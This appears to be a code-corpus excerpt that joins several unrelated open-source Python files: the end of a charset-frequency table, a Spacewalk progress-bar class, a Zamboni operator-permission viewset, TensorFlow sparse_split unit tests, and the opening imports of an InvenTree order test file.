809,7834,7835,7836, 575,2730,3477, 956,1552,1469,1144,2323,7837,2324,1560,2457, # 6822
3580,3226,4005, 616,2207,3155,2180,2289,7838,1832,7839,3478,4506,7840,1319,3704, # 6838
3705,1211,3581,1023,3227,1293,2799,7841,7842,7843,3826, 607,2306,3827, 762,2878, # 6854
1439,4221,1360,7844,1485,3052,7845,4507,1038,4222,1450,2061,2638,4223,1379,4508, # 6870
2585,7846,7847,4224,1352,1414,2325,2921,1172,7848,7849,3828,3829,7850,1797,1451, # 6886
7851,7852,7853,7854,2922,4006,4007,2485,2346, 411,4008,4009,3582,3300,3101,4509, # 6902
1561,2664,1452,4010,1375,7855,7856, 47,2959, 316,7857,1406,1591,2923,3156,7858, # 6918
1025,2141,3102,3157, 354,2731, 884,2224,4225,2407, 508,3706, 726,3583, 996,2428, # 6934
3584, 729,7859, 392,2191,1453,4011,4510,3707,7860,7861,2458,3585,2608,1675,2800, # 6950
919,2347,2960,2348,1270,4511,4012, 73,7862,7863, 647,7864,3228,2843,2255,1550, # 6966
1346,3006,7865,1332, 883,3479,7866,7867,7868,7869,3301,2765,7870,1212, 831,1347, # 6982
4226,4512,2326,3830,1863,3053, 720,3831,4513,4514,3832,7871,4227,7872,7873,4515, # 6998
7874,7875,1798,4516,3708,2609,4517,3586,1645,2371,7876,7877,2924, 669,2208,2665, # 7014
2429,7878,2879,7879,7880,1028,3229,7881,4228,2408,7882,2256,1353,7883,7884,4518, # 7030
3158, 518,7885,4013,7886,4229,1960,7887,2142,4230,7888,7889,3007,2349,2350,3833, # 7046
516,1833,1454,4014,2699,4231,4519,2225,2610,1971,1129,3587,7890,2766,7891,2961, # 7062
1422, 577,1470,3008,1524,3373,7892,7893, 432,4232,3054,3480,7894,2586,1455,2508, # 7078
2226,1972,1175,7895,1020,2732,4015,3481,4520,7896,2733,7897,1743,1361,3055,3482, # 7094
2639,4016,4233,4521,2290, 895, 924,4234,2170, 331,2243,3056, 166,1627,3057,1098, # 7110
7898,1232,2880,2227,3374,4522, 657, 403,1196,2372, 542,3709,3375,1600,4235,3483, # 7126
7899,4523,2767,3230, 576, 530,1362,7900,4524,2533,2666,3710,4017,7901, 842,3834, # 7142
7902,2801,2031,1014,4018, 213,2700,3376, 665, 621,4236,7903,3711,2925,2430,7904, # 7158
2431,3302,3588,3377,7905,4237,2534,4238,4525,3589,1682,4239,3484,1380,7906, 724, # 7174
2277, 600,1670,7907,1337,1233,4526,3103,2244,7908,1621,4527,7909, 651,4240,7910, # 7190
1612,4241,2611,7911,2844,7912,2734,2307,3058,7913, 716,2459,3059, 174,1255,2701, # 7206
4019,3590, 548,1320,1398, 728,4020,1574,7914,1890,1197,3060,4021,7915,3061,3062, # 7222
3712,3591,3713, 747,7916, 635,4242,4528,7917,7918,7919,4243,7920,7921,4529,7922, # 7238
3378,4530,2432, 451,7923,3714,2535,2072,4244,2735,4245,4022,7924,1764,4531,7925, # 7254
4246, 350,7926,2278,2390,2486,7927,4247,4023,2245,1434,4024, 488,4532, 458,4248, # 7270
4025,3715, 771,1330,2391,3835,2568,3159,2159,2409,1553,2667,3160,4249,7928,2487, # 7286
2881,2612,1720,2702,4250,3379,4533,7929,2536,4251,7930,3231,4252,2768,7931,2015, # 7302
2736,7932,1155,1017,3716,3836,7933,3303,2308, 201,1864,4253,1430,7934,4026,7935, # 7318
7936,7937,7938,7939,4254,1604,7940, 414,1865, 371,2587,4534,4535,3485,2016,3104, # 7334
4536,1708, 960,4255, 887, 389,2171,1536,1663,1721,7941,2228,4027,2351,2926,1580, # 7350
7942,7943,7944,1744,7945,2537,4537,4538,7946,4539,7947,2073,7948,7949,3592,3380, # 7366
2882,4256,7950,4257,2640,3381,2802, 673,2703,2460, 709,3486,4028,3593,4258,7951, # 7382
1148, 502, 634,7952,7953,1204,4540,3594,1575,4541,2613,3717,7954,3718,3105, 948, # 7398
3232, 121,1745,3837,1110,7955,4259,3063,2509,3009,4029,3719,1151,1771,3838,1488, # 7414
4030,1986,7956,2433,3487,7957,7958,2093,7959,4260,3839,1213,1407,2803, 531,2737, # 7430
2538,3233,1011,1537,7960,2769,4261,3106,1061,7961,3720,3721,1866,2883,7962,2017, # 7446
120,4262,4263,2062,3595,3234,2309,3840,2668,3382,1954,4542,7963,7964,3488,1047, # 7462
2704,1266,7965,1368,4543,2845, 649,3383,3841,2539,2738,1102,2846,2669,7966,7967, # 7478
1999,7968,1111,3596,2962,7969,2488,3842,3597,2804,1854,3384,3722,7970,7971,3385, # 7494
2410,2884,3304,3235,3598,7972,2569,7973,3599,2805,4031,1460, 856,7974,3600,7975, # 7510
2885,2963,7976,2886,3843,7977,4264, 632,2510, 875,3844,1697,3845,2291,7978,7979, # 7526
4544,3010,1239, 580,4545,4265,7980, 914, 936,2074,1190,4032,1039,2123,7981,7982, # 7542
7983,3386,1473,7984,1354,4266,3846,7985,2172,3064,4033, 915,3305,4267,4268,3306, # 7558
1605,1834,7986,2739, 398,3601,4269,3847,4034, 328,1912,2847,4035,3848,1331,4270, # 7574
3011, 937,4271,7987,3602,4036,4037,3387,2160,4546,3388, 524, 742, 538,3065,1012, # 7590
7988,7989,3849,2461,7990, 658,1103, 225,3850,7991,7992,4547,7993,4548,7994,3236, # 7606
1243,7995,4038, 963,2246,4549,7996,2705,3603,3161,7997,7998,2588,2327,7999,4550, # 7622
8000,8001,8002,3489,3307, 957,3389,2540,2032,1930,2927,2462, 870,2018,3604,1746, # 7638
2770,2771,2434,2463,8003,3851,8004,3723,3107,3724,3490,3390,3725,8005,1179,3066, # 7654
8006,3162,2373,4272,3726,2541,3163,3108,2740,4039,8007,3391,1556,2542,2292, 977, # 7670
2887,2033,4040,1205,3392,8008,1765,3393,3164,2124,1271,1689, 714,4551,3491,8009, # 7686
2328,3852, 533,4273,3605,2181, 617,8010,2464,3308,3492,2310,8011,8012,3165,8013, # 7702
8014,3853,1987, 618, 427,2641,3493,3394,8015,8016,1244,1690,8017,2806,4274,4552, # 7718
8018,3494,8019,8020,2279,1576, 473,3606,4275,3395, 972,8021,3607,8022,3067,8023, # 7734
8024,4553,4554,8025,3727,4041,4042,8026, 153,4555, 356,8027,1891,2888,4276,2143, # 7750
408, 803,2352,8028,3854,8029,4277,1646,2570,2511,4556,4557,3855,8030,3856,4278, # 7766
8031,2411,3396, 752,8032,8033,1961,2964,8034, 746,3012,2465,8035,4279,3728, 698, # 7782
4558,1892,4280,3608,2543,4559,3609,3857,8036,3166,3397,8037,1823,1302,4043,2706, # 7798
3858,1973,4281,8038,4282,3167, 823,1303,1288,1236,2848,3495,4044,3398, 774,3859, # 7814
8039,1581,4560,1304,2849,3860,4561,8040,2435,2161,1083,3237,4283,4045,4284, 344, # 7830
1173, 288,2311, 454,1683,8041,8042,1461,4562,4046,2589,8043,8044,4563, 985, 894, # 7846
8045,3399,3168,8046,1913,2928,3729,1988,8047,2110,1974,8048,4047,8049,2571,1194, # 7862
425,8050,4564,3169,1245,3730,4285,8051,8052,2850,8053, 636,4565,1855,3861, 760, # 7878
1799,8054,4286,2209,1508,4566,4048,1893,1684,2293,8055,8056,8057,4287,4288,2210, # 7894
479,8058,8059, 832,8060,4049,2489,8061,2965,2490,3731, 990,3109, 627,1814,2642, # 7910
4289,1582,4290,2125,2111,3496,4567,8062, 799,4291,3170,8063,4568,2112,1737,3013, # 7926
1018, 543, 754,4292,3309,1676,4569,4570,4050,8064,1489,8065,3497,8066,2614,2889, # 7942
4051,8067,8068,2966,8069,8070,8071,8072,3171,4571,4572,2182,1722,8073,3238,3239, # 7958
1842,3610,1715, 481, 365,1975,1856,8074,8075,1962,2491,4573,8076,2126,3611,3240, # 7974
433,1894,2063,2075,8077, 602,2741,8078,8079,8080,8081,8082,3014,1628,3400,8083, # 7990
3172,4574,4052,2890,4575,2512,8084,2544,2772,8085,8086,8087,3310,4576,2891,8088, # 8006
4577,8089,2851,4578,4579,1221,2967,4053,2513,8090,8091,8092,1867,1989,8093,8094, # 8022
8095,1895,8096,8097,4580,1896,4054, 318,8098,2094,4055,4293,8099,8100, 485,8101, # 8038
938,3862, 553,2670, 116,8102,3863,3612,8103,3498,2671,2773,3401,3311,2807,8104, # 8054
3613,2929,4056,1747,2930,2968,8105,8106, 207,8107,8108,2672,4581,2514,8109,3015, # 8070
890,3614,3864,8110,1877,3732,3402,8111,2183,2353,3403,1652,8112,8113,8114, 941, # 8086
2294, 208,3499,4057,2019, 330,4294,3865,2892,2492,3733,4295,8115,8116,8117,8118, # 8102
# Everything below is of no interest for detection purposes
2515,1613,4582,8119,3312,3866,2516,8120,4058,8121,1637,4059,2466,4583,3867,8122, # 8118
2493,3016,3734,8123,8124,2192,8125,8126,2162,8127,8128,8129,8130,8131,8132,8133, # 8134
8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,8144,8145,8146,8147,8148,8149, # 8150
8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,8160,8161,8162,8163,8164,8165, # 8166
8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181, # 8182
8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197, # 8198
8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213, # 8214
8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229, # 8230
8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245, # 8246
8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,8256,8257,8258,8259,8260,8261, # 8262
8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,8272,8273,8274,8275,8276,8277, # 8278
8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,8290,8291,8292,8293, # 8294
8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,8308,8309, # 8310
8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322,8323,8324,8325, # 8326
8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337,8338,8339,8340,8341, # 8342
8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353,8354,8355,8356,8357, # 8358
8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,8368,8369,8370,8371,8372,8373, # 8374
8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,8384,8385,8386,8387,8388,8389, # 8390
8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,8400,8401,8402,8403,8404,8405, # 8406
8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,8416,8417,8418,8419,8420,8421, # 8422
8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,8432,8433,8434,8435,8436,8437, # 8438
8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,8448,8449,8450,8451,8452,8453, # 8454
8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,8464,8465,8466,8467,8468,8469, # 8470
8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,8480,8481,8482,8483,8484,8485, # 8486
8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501, # 8502
8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517, # 8518
8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533, # 8534
8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549, # 8550
8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,8565, # 8566
8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,8576,8577,8578,8579,8580,8581, # 8582
8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597, # 8598
8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,8608,8609,8610,8611,8612,8613, # 8614
8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,8624,8625,8626,8627,8628,8629, # 8630
8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,8640,8641,8642,8643,8644,8645, # 8646
8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,8657,8658,8659,8660,8661, # 8662
8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672,8673,8674,8675,8676,8677, # 8678
8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,8688,8689,8690,8691,8692,8693, # 8694
8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710
8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726
8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742
# flake8: noqa
| mit |
mcalmer/spacewalk | backend/satellite_tools/progress_bar.py | 10 | 4321 | #
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import sys
import time
class ProgressBar:
    """A simple textual progress bar.

    Writes a growing run of ``barChar`` characters to ``stream`` as the
    tracked size advances toward ``finalSize`` via ``update``/``addTo``.
    See the example in this module's ``__main__`` section.
    """
    def __init__(self, prompt='working: ', endTag=' - done',
                 finalSize=100.0, finalBarLength=10,
                 barChar='#', stream=sys.stdout, redrawYN=1):
        # Redrawing (backspace-and-repaint) is force-disabled: too many
        # people complained about the control characters in captured output.
        redrawYN = 0
        self.size = 0.0                # progress so far, in finalSize units
        self.barLength = 0             # bar chars that *should* be visible
        self.barLengthPrinted = 0      # bar chars already written to stream
        self.prompt = prompt
        self.endTag = endTag
        self.finalSize = float(finalSize)
        self.finalBarLength = int(finalBarLength)
        self.barChar = barChar
        self.stream = stream
        self.redrawYN = redrawYN
        # Repainting in place only makes sense on an interactive terminal.
        if self.stream not in [sys.stdout, sys.stderr]:
            self.redrawYN = 0
    def reinit(self):
        """Reset progress to zero so the bar object can be reused."""
        self.size = 0.0
        self.barLength = 0
        self.barLengthPrinted = 0
    def printAll(self, contextYN=0):
        """Print/reprint the prompt and the current run of bar characters.

        Eg: ____________________
            Processing: ###########

        The underscore "ruler" line is only emitted when contextYN is true.
        """
        if contextYN:
            self.stream.write(' ' * len(self.prompt) + '_' * self.finalBarLength + '\n')
        rendered = self.prompt + self.barChar * self.barLength
        if self.redrawYN:
            # Wipe the whole line (80 columns assumed wide enough), blank
            # it out, then back up so the repaint starts at column 0.
            self.stream.write('\b' * 80)
            fullWidth = len(self.prompt + self.endTag) + self.finalBarLength
            self.stream.write(fullWidth * ' ')
            self.stream.write(fullWidth * '\b')
        self.stream.write(rendered)
        self.stream.flush()
        self.barLengthPrinted = self.barLength
    def printIncrement(self):
        """Visually update the bar, emitting only the not-yet-printed part."""
        if self.redrawYN:
            self.printAll(contextYN=0)
        else:
            delta = self.barLength - self.barLengthPrinted
            self.stream.write(self.barChar * delta)
            self.stream.flush()
        self.barLengthPrinted = self.barLength
    def printComplete(self):
        """Force the bar to 100% regardless of current status, print the
        remainder, and append the end tag."""
        self.complete()
        self.printIncrement()
        self.stream.write(self.endTag + '\n')
        self.stream.flush()
    def update(self, newSize):
        """Set the tracked size to newSize (clamped to finalSize)."""
        self.size = min(float(newSize), self.finalSize)
        if self.finalSize == 0:
            # Degenerate zero-length job: always show a full bar.
            self.barLength = self.finalBarLength
        else:
            self.barLength = min(
                int((self.size * self.finalBarLength) / self.finalSize),
                self.finalBarLength)
    def addTo(self, additionalSize):
        """Advance the tracked size by additionalSize."""
        self.update(self.size + additionalSize)
    def complete(self):
        """Mark the bar as fully complete (state only; nothing is printed)."""
        self.update(self.finalSize)
#------------------------------------------------------------------------------
# Self-demo: render a 40-character bar while "processing" 200 items.
if __name__ == '__main__':
    print("An example:")
    bar_length = 40
    items = 200
    pb = ProgressBar('standby: ', ' - all done!', items, bar_length, 'o')
    pb.printAll(1)  # emit the underscore ruler plus the (empty) bar
    for i in range(items):
        # pb.update(i)  # absolute update would also work; addTo is incremental
        pb.addTo(1)
        time.sleep(0.005)  # simulate a unit of work
        pb.printIncrement()
    pb.printComplete()
#------------------------------------------------------------------------------
| gpl-2.0 |
mozilla/zamboni | mkt/operators/views.py | 6 | 1262 | from rest_framework import mixins, response, status, viewsets
from mkt.access import acl
from mkt.api.base import CORSMixin
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.users.models import UserProfile
from .models import OperatorPermission
from .serializers import OperatorPermissionSerializer
class OperatorPermissionViewSet(CORSMixin, mixins.ListModelMixin,
                                viewsets.GenericViewSet):
    """List the operator permissions held by the requesting user.

    GET-only, CORS-enabled endpoint. A user allowed the OperatorDashboard
    action is treated as an operator everywhere, signalled by a ['*'] body.
    """
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    cors_allowed_methods = ('GET',)
    queryset = OperatorPermission.objects.all()
    permission_classes = []
    serializer_class = OperatorPermissionSerializer
    def get_queryset(self):
        """Restrict results to the authenticated user's own permissions."""
        user = self.request.user
        if not isinstance(user, UserProfile):
            # Anonymous (non-profile) requests see nothing.
            return self.queryset.none()
        return self.queryset.filter(user=user)
    def list(self, request, *args, **kwargs):
        """Short-circuit with the wildcard marker for dashboard admins."""
        is_admin = acl.action_allowed(request, 'OperatorDashboard', '*')
        if is_admin:
            return response.Response(['*'], status=status.HTTP_200_OK)
        return super(OperatorPermissionViewSet, self).list(
            request, *args, **kwargs)
| bsd-3-clause |
awni/tensorflow | tensorflow/python/kernel_tests/sparse_split_op_test.py | 15 | 12538 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SparseReorder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class SparseSplitOpTest(tf.test.TestCase):
  """Covers tf.sparse_split over rows, columns, and a rank-3 slice axis."""

  def _SparseTensor_4x6(self):
    """4x6 fixture; each populated cell holds 10*row + col:

        [0 |  |2 |  |4 |5 ]
        [  |11|  |13|14|  ]
        [20|  |  |23|  |25]
        [30|  |32|33|  |35]
    """
    indices = np.array([[0, 0], [0, 2], [0, 4], [0, 5],
                        [1, 1], [1, 3], [1, 4],
                        [2, 0], [2, 3], [2, 5],
                        [3, 0], [3, 2], [3, 3], [3, 5]]).astype(np.int64)
    values = np.array(
        [0, 2, 4, 5, 11, 13, 14, 20, 23, 25, 30, 32, 33, 35]).astype(np.int64)
    dense_shape = np.array([4, 6]).astype(np.int64)
    return tf.SparseTensor(indices, values, dense_shape)

  def _SparseTensor_5x7(self):
    """5x7 fixture; each populated cell holds 10*row + col:

        [0 |  |2 |  |4 |5 |  ]
        [  |11|  |13|14|  |16]
        [20|  |  |23|  |25|  ]
        [30|  |32|33|  |35|  ]
        [  |41|  |  |44|  |46]
    """
    indices = np.array([[0, 0], [0, 2], [0, 4], [0, 5],
                        [1, 1], [1, 3], [1, 4], [1, 6],
                        [2, 0], [2, 3], [2, 5],
                        [3, 0], [3, 2], [3, 3], [3, 5],
                        [4, 1], [4, 4], [4, 6]]).astype(np.int64)
    values = np.array([0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25, 30, 32, 33,
                       35, 41, 44, 46]).astype(np.int64)
    dense_shape = np.array([5, 7]).astype(np.int64)
    return tf.SparseTensor(indices, values, dense_shape)

  def _SparseTensor_3x4x2(self):
    """3x4x2 fixture; slice (:, :, 0) holds 'a0'..'e0' and slice (:, :, 1)
    holds the matching 'a1'..'e1' entries at the same 3x4 positions.
    """
    indices = np.array([[0, 0, 0], [0, 0, 1], [0, 2, 0], [0, 2, 1],
                        [1, 1, 0], [1, 1, 1], [1, 3, 0], [1, 3, 1],
                        [2, 2, 0], [2, 2, 1]]).astype(np.int64)
    values = np.array(
        ['a0', 'a1', 'b0', 'b1', 'c0', 'c1', 'd0', 'd1', 'e0', 'e1'])
    dense_shape = np.array([3, 4, 2]).astype(np.int64)
    return tf.SparseTensor(indices, values, dense_shape)

  def testSplitMatrixRows(self):
    """An even row split of the 4x6 tensor yields two 2x6 pieces."""
    with self.test_session(use_gpu=False):
      pieces = tf.sparse_split(0, 2, self._SparseTensor_4x6())
      self.assertAllEqual(len(pieces), 2)
      self.assertAllEqual(
          pieces[0].indices.eval(),
          [[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4]])
      self.assertAllEqual(pieces[0].values.eval(), [0, 2, 4, 5, 11, 13, 14])
      self.assertAllEqual(pieces[0].shape.eval(), [2, 6])
      self.assertAllEqual(
          pieces[1].indices.eval(),
          [[0, 0], [0, 3], [0, 5], [1, 0], [1, 2], [1, 3], [1, 5]])
      self.assertAllEqual(pieces[1].values.eval(),
                          [20, 23, 25, 30, 32, 33, 35])
      self.assertAllEqual(pieces[1].shape.eval(), [2, 6])

  def testSplitMatrixUnevenCols(self):
    """7 columns into 3 then 4 pieces: leading pieces absorb the remainder."""
    with self.test_session(use_gpu=False):
      thirds = tf.sparse_split(1, 3, self._SparseTensor_5x7())
      self.assertAllEqual(len(thirds), 3)
      self.assertAllEqual(thirds[0].indices.eval(),
                          [[0, 0], [0, 2], [1, 1], [2, 0], [3, 0], [3, 2],
                           [4, 1]])
      self.assertAllEqual(thirds[0].values.eval(),
                          [0, 2, 11, 20, 30, 32, 41])
      self.assertAllEqual(thirds[0].shape.eval(), [5, 3])
      self.assertAllEqual(thirds[1].indices.eval(),
                          [[0, 1], [1, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
      self.assertAllEqual(thirds[1].values.eval(), [4, 13, 14, 23, 33, 44])
      self.assertAllEqual(thirds[1].shape.eval(), [5, 2])
      self.assertAllEqual(thirds[2].indices.eval(),
                          [[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
      self.assertAllEqual(thirds[2].values.eval(), [5, 16, 25, 35, 46])
      self.assertAllEqual(thirds[2].shape.eval(), [5, 2])
      quarters = tf.sparse_split(1, 4, self._SparseTensor_5x7())
      self.assertAllEqual(len(quarters), 4)
      self.assertAllEqual(quarters[0].indices.eval(),
                          [[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
      self.assertAllEqual(quarters[0].values.eval(), [0, 11, 20, 30, 41])
      self.assertAllEqual(quarters[0].shape.eval(), [5, 2])
      self.assertAllEqual(quarters[1].indices.eval(),
                          [[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
      self.assertAllEqual(quarters[1].values.eval(), [2, 13, 23, 32, 33])
      self.assertAllEqual(quarters[1].shape.eval(), [5, 2])
      self.assertAllEqual(quarters[2].indices.eval(),
                          [[0, 0], [0, 1], [1, 0], [2, 1], [3, 1], [4, 0]])
      self.assertAllEqual(quarters[2].values.eval(), [4, 5, 14, 25, 35, 44])
      self.assertAllEqual(quarters[2].shape.eval(), [5, 2])
      self.assertAllEqual(quarters[3].indices.eval(), [[1, 0], [4, 0]])
      self.assertAllEqual(quarters[3].values.eval(), [16, 46])
      self.assertAllEqual(quarters[3].shape.eval(), [5, 1])

  def testSplitMatrixUnevenRows(self):
    """5 rows into 2 then 3 pieces: leading pieces absorb the remainder."""
    with self.test_session(use_gpu=False):
      halves = tf.sparse_split(0, 2, self._SparseTensor_5x7())
      self.assertAllEqual(halves[0].indices.eval(),
                          [[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3],
                           [1, 4], [1, 6], [2, 0], [2, 3], [2, 5]])
      self.assertAllEqual(halves[0].values.eval(),
                          [0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25])
      self.assertAllEqual(halves[0].shape.eval(), [3, 7])
      self.assertAllEqual(halves[1].indices.eval(),
                          [[0, 0], [0, 2], [0, 3], [0, 5], [1, 1], [1, 4],
                           [1, 6]])
      self.assertAllEqual(halves[1].values.eval(),
                          [30, 32, 33, 35, 41, 44, 46])
      self.assertAllEqual(halves[1].shape.eval(), [2, 7])
      self.assertAllEqual(len(halves), 2)
      thirds = tf.sparse_split(0, 3, self._SparseTensor_5x7())
      self.assertAllEqual(len(thirds), 3)
      self.assertAllEqual(thirds[0].indices.eval(),
                          [[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3],
                           [1, 4], [1, 6]])
      self.assertAllEqual(thirds[0].values.eval(),
                          [0, 2, 4, 5, 11, 13, 14, 16])
      self.assertAllEqual(thirds[0].shape.eval(), [2, 7])
      self.assertAllEqual(thirds[1].values.eval(),
                          [20, 23, 25, 30, 32, 33, 35])
      self.assertAllEqual(thirds[1].shape.eval(), [2, 7])
      self.assertAllEqual(thirds[2].indices.eval(),
                          [[0, 1], [0, 4], [0, 6]])
      self.assertAllEqual(thirds[2].values.eval(), [41, 44, 46])
      self.assertAllEqual(thirds[2].shape.eval(), [1, 7])

  def testSplitAllRows(self):
    """Splitting the 4x6 tensor into 4 gives one 1x6 piece per row."""
    with self.test_session(use_gpu=False):
      rows = tf.sparse_split(0, 4, self._SparseTensor_4x6())
      self.assertAllEqual(len(rows), 4)
      self.assertAllEqual(rows[0].indices.eval(),
                          [[0, 0], [0, 2], [0, 4], [0, 5]])
      self.assertAllEqual(rows[0].values.eval(), [0, 2, 4, 5])
      self.assertAllEqual(rows[0].shape.eval(), [1, 6])
      self.assertAllEqual(rows[1].indices.eval(),
                          [[0, 1], [0, 3], [0, 4]])
      self.assertAllEqual(rows[1].values.eval(), [11, 13, 14])
      self.assertAllEqual(rows[1].shape.eval(), [1, 6])
      self.assertAllEqual(rows[2].indices.eval(),
                          [[0, 0], [0, 3], [0, 5]])
      self.assertAllEqual(rows[2].values.eval(), [20, 23, 25])
      self.assertAllEqual(rows[2].shape.eval(), [1, 6])
      self.assertAllEqual(rows[3].indices.eval(),
                          [[0, 0], [0, 2], [0, 3], [0, 5]])
      self.assertAllEqual(rows[3].values.eval(), [30, 32, 33, 35])
      self.assertAllEqual(rows[3].shape.eval(), [1, 6])

  def testSplitColumns(self):
    """Splitting 6 columns into 3 gives three 4x2 pieces."""
    with self.test_session(use_gpu=False):
      cols = tf.sparse_split(1, 3, self._SparseTensor_4x6())
      self.assertAllEqual(len(cols), 3)
      self.assertAllEqual(cols[0].indices.eval(),
                          [[0, 0], [1, 1], [2, 0], [3, 0]])
      self.assertAllEqual(cols[0].values.eval(), [0, 11, 20, 30])
      self.assertAllEqual(cols[0].shape.eval(), [4, 2])
      self.assertAllEqual(cols[1].indices.eval(),
                          [[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
      self.assertAllEqual(cols[1].values.eval(), [2, 13, 23, 32, 33])
      self.assertAllEqual(cols[1].shape.eval(), [4, 2])
      self.assertAllEqual(cols[2].indices.eval(),
                          [[0, 0], [0, 1], [1, 0], [2, 1], [3, 1]])
      self.assertAllEqual(cols[2].values.eval(), [4, 5, 14, 25, 35])
      self.assertAllEqual(cols[2].shape.eval(), [4, 2])

  def testSplitAllColumns(self):
    """Splitting the 4x6 tensor into 6 gives one 4x1 piece per column."""
    with self.test_session(use_gpu=False):
      cols = tf.sparse_split(1, 6, self._SparseTensor_4x6())
      self.assertAllEqual(len(cols), 6)
      self.assertAllEqual(cols[0].indices.eval(),
                          [[0, 0], [2, 0], [3, 0]])
      self.assertAllEqual(cols[0].values.eval(), [0, 20, 30])
      self.assertAllEqual(cols[0].shape.eval(), [4, 1])
      self.assertAllEqual(cols[1].indices.eval(), [[1, 0]])
      self.assertAllEqual(cols[1].values.eval(), [11])
      self.assertAllEqual(cols[1].shape.eval(), [4, 1])
      self.assertAllEqual(cols[2].indices.eval(), [[0, 0], [3, 0]])
      self.assertAllEqual(cols[2].values.eval(), [2, 32])
      self.assertAllEqual(cols[2].shape.eval(), [4, 1])
      self.assertAllEqual(cols[3].indices.eval(),
                          [[1, 0], [2, 0], [3, 0]])
      self.assertAllEqual(cols[3].shape.eval(), [4, 1])
      self.assertAllEqual(cols[3].values.eval(), [13, 23, 33])
      self.assertAllEqual(cols[4].indices.eval(), [[0, 0], [1, 0]])
      self.assertAllEqual(cols[4].values.eval(), [4, 14])
      self.assertAllEqual(cols[4].shape.eval(), [4, 1])
      self.assertAllEqual(cols[5].indices.eval(),
                          [[0, 0], [2, 0], [3, 0]])
      self.assertAllEqual(cols[5].values.eval(), [5, 25, 35])
      self.assertAllEqual(cols[5].shape.eval(), [4, 1])

  def testSliceConcat(self):
    """Splitting and then concatenating along the same axis round-trips."""
    with self.test_session(use_gpu=False):
      slices = tf.sparse_split(1, 2, self._SparseTensor_3x4x2())
      rejoined = tf.sparse_concat(1, slices)
      expected = self._SparseTensor_3x4x2()
      self.assertAllEqual(rejoined.indices.eval(),
                          expected.indices.eval())
if __name__ == '__main__':
  tf.test.main()  # discover and run every test method in this file
| apache-2.0 |
SchrodingersGat/InvenTree | InvenTree/order/tests.py | 2 | 6307 | # -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.test import TestCase
import django.core.exceptions as django_exceptions
from part.models import Part
from .models import PurchaseOrder, PurchaseOrderLineItem
from stock.models import StockLocation
from company.models import SupplierPart
from InvenTree.status_codes import PurchaseOrderStatus
